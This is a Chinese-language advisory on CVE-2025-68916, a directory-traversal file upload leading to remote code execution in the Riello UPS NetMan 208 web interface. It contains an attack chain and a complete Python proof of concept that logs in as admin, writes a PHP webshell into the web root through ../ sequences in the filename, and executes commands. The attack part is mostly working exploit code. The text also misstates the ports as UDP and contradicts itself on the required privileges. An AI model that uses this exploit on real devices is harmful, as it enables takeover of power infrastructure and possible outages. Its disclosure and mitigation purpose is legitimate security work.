CVE-2025-68916: Riello UPS NetMan 208 目录遍历文件上传导致远程代码执行

漏洞信息

漏洞编号

CVE-2025-68916

漏洞类型

目录遍历/文件上传/远程代码执行

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Riello UPS NetMan 208 Application

漏洞概述

CVE-2025-68916是Riello UPS NetMan 208 Application在1.12版本之前存在的严重安全漏洞。该漏洞允许攻击者通过cgi-bin/certsupload.cgi接口利用目录遍历技术（/../）绕过路径限制，上传恶意文件到服务器任意目录，最终实现远程代码执行。Riello UPS NetMan 208是一款广泛应用于数据中心和关键基础设施的UPS（不间断电源）网络管理设备，其Web管理界面存在此高危漏洞。攻击者无需普通用户权限即可利用该漏洞，但需要具备较高的认证权限（PR:H）。由于CVSS评分高达9.1，属于严重级别，对机密性、完整性和可用性均造成严重影响。此漏洞已被公开披露，野外可能存在利用风险，建议立即采取修复措施。

技术细节

该漏洞存在于Riello UPS NetMan 208 Application的cgi-bin/certsupload.cgi组件中。漏洞本质是路径遍历（Path Traversal）配合文件上传功能。攻击者通过构造特殊的HTTP请求，在文件名参数中注入../序列来穿越目录结构，绕过安全检查将恶意文件写入服务器系统目录。具体利用方式：首先识别目标设备的管理Web界面，然后构造包含目录遍历序列的文件上传请求，将webshell或恶意可执行文件上传到Web根目录或其他可执行目录。由于该设备运行在关键基础设施中，攻击成功后可完全控制UPS系统，可能导致电力供应中断、数据丢失或物理设备损坏。漏洞的认证要求为高权限（PR:H），意味着攻击者需要具备管理员或相当权限的账户才能利用此漏洞。

攻击链分析

STEP 1

步骤1: 信息收集

识别目标Riello UPS NetMan 208设备，确认Web管理界面可访问，通常位于80/443端口

STEP 2

步骤2: 认证获取

使用高权限账户（如admin）登录Web管理界面，获取有效会话cookie

STEP 3

步骤3: 构造恶意请求

构造包含目录遍历序列（/../）的HTTP POST请求到cgi-bin/certsupload.cgi，将恶意PHP文件（如webshell）作为证书文件上传

STEP 4

步骤4: 路径穿越上传

通过在文件名中注入../../../../../../../../../var/www/html/等路径遍历序列，绕过文件上传路径限制，将webshell写入Web根目录

STEP 5

步骤5: 远程代码执行

访问上传的webshell（如shell.php），通过cmd参数执行任意系统命令，实现对UPS设备的完全控制

STEP 6

步骤6: 持久化控制

上传持久化后门程序，可能修改UPS配置导致电力中断或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-68916 PoC - Riello UPS NetMan 208 Directory Traversal File Upload RCE
Note: This PoC is for educational and authorized testing purposes only.
"""

import requests
import sys

target = "http://target-ip"  # Replace with target IP
username = "admin"  # Replace with valid credentials
password = "admin"  # Replace with valid password

def exploit_cve_2025_68916():
    """Exploit directory traversal file upload vulnerability"""
    
    # Step 1: Login to get session
    login_url = f"{target}/cgi-bin/login.cgi"
    login_data = {
        "username": username,
        "password": password
    }
    
    session = requests.Session()
    try:
        response = session.post(login_url, data=login_data, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False
    
    # Step 2: Upload malicious file via directory traversal
    upload_url = f"{target}/cgi-bin/certsupload.cgi"
    
    # Path traversal payload to write to web root
    malicious_filename = "../../../../../../../../../var/www/html/shell.php"
    
    files = {
        'certificate': (malicious_filename, '<?php system($_GET["cmd"]); ?>', 'application/x-php')
    }
    
    try:
        response = session.post(upload_url, files=files, timeout=10)
        print(f"[+] Upload request sent")
        print(f"[*] Response status: {response.status_code}")
        
        # Step 3: Verify shell was uploaded
        shell_url = f"{target}/shell.php"
        test_response = session.get(f"{shell_url}?cmd=id", timeout=10)
        
        if test_response.status_code == 200:
            print(f"[+] Shell uploaded successfully!")
            print(f"[+] Access shell at: {shell_url}")
            print(f"[*] Test command output: {test_response.text}")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Exploitation failed: {e}")
        return False
    
    return False

if __name__ == "__main__":
    print("[*] CVE-2025-68916 - Riello UPS NetMan 208 RCE PoC")
    exploit_cve_2025_68916()

影响范围

Riello UPS NetMan 208 Application < 1.12

防御指南

临时缓解措施

立即将Riello UPS NetMan 208 Application升级到1.12版本以修复此漏洞。如果无法立即升级，可采取以下临时措施：1）禁用不必要的Web管理功能；2）通过防火墙限制对UDP 80/443端口的管理访问，仅允许受信任的IP地址；3）启用入侵检测系统监控异常的目录遍历请求模式；4）定期检查/var/www/html等Web目录是否有未知文件。由于该漏洞已公开披露且CVSS评分高达9.1分，建议将其作为最高优先级处理。